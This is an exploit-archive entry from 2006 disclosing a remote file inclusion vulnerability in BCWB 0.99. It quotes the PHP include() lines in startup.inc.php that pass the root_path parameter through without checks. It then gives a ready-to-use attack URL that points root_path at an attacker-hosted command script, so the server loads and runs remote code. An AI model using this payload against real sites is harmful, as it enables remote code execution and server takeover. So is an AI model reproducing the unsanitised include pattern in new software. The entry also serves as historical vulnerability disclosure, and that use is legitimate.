[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : BCWB <= 0.99 (root_path) Remote File Include Vulnerability
# Published : 2006-09-19
# Author : ajann
# Previous Title : Digital WebShop <= 1.128 Multiple Remote File Include Vulnerabilities
# Next Title : AlstraSoft E-Friends <= 4.85 Remote Command Execution Exploit


*******************************************************************************
# Title  :  Bcwb 0.99(root_path)Remote File Include Vulnerability

# Author :   ajann

# Greetz :   shadow and Suskun for host : )

# Exploit;

*******************************************************************************
[File]
startup.inc.php
[/File]

[Code,1]
startup.inc.php Error:


..
....
// Debug services
include($root_path.'include/startup/debug.inc.php');
include($root_path.'include/startup/common_functions.inc.php');
include($root_path.'include/lib/data.lib.php');
....
..

Key [:] root_path=http://target.com/command.php?

Example:

http://target.com/include/startup.inc.php?root_path=http://target.com/command.php?

# ajann,Turkey
# ...
# Im not Hacker!

# www.Syue.com [2006-09-19]